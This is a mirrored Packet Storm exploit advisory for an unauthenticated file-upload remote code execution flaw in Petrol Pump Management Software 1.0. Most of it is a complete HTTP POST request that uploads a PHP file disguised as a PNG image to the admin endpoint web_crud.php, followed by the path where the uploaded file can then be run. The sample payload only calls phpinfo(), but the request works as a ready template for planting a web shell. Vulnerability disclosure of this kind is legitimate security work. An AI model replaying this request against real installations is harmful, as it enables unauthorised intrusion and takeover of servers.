Petrol Pump Management Software 1.0 Shell Upload
2024-2-20 23:30:42 Author: packetstormsecurity.com(查看原文) 阅读量:4 收藏

# Exploit Title: Petrol pump management software - File Upload Remote Code Execution (RCE) (unauthenticated)
# Google Dork: N/A
# Application: Petrol pump management software
# Date: 20.02.2024
# Bugs: File Upload Remote Code Execution (RCE) (unauthenticated)
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A

## Vulnerability Description:

Due to a security vulnerability in "fuelflow/admin/app/web_crud.php," unauthorized users can upload
files using the "POST" method. The uploaded files are stored in the "/fuelflow/assets/images" folder.
This allows malicious individuals to execute unauthorized commands on the system.

## Staus: HIGH-CRITICAL Vulnerability

## Proof of Concept (PoC):

Video:
https://drive.google.com/file/d/1_jue-UhpASC_XxcUWU-QhMYDrSIehnWx/view

// File upload Request

POST /zerday/fuelflow/admin/app/web_crud.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------82750242321210078514140255085
Origin: http://localhost
Connection: close
Referer: http://localhost/zer/fuelflow/admin/web.php
Cookie: PHPSESSID=1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="id"

1
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="old_photo1_img"

test.png
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="photo1"; filename="3.php"
Content-Type: image/png

<?php phpinfo();?>
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="title"

FuelFlow lite - Developed by Mayuri K. tessss
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="old_photos_img"

test.png
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="photos"; filename=""
Content-Type: application/octet-stream

-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="sitekey"

test
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="secretkey"

test
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="update"

-----------------------------82750242321210078514140255085--

// Phpinfo file locaton

/zerday/fuelflow/assets/images/65d45a6080eca.php


文章来源: https://packetstormsecurity.com/files/177210/ppms10-shell.txt
如有侵权请联系:admin#unsafe.sh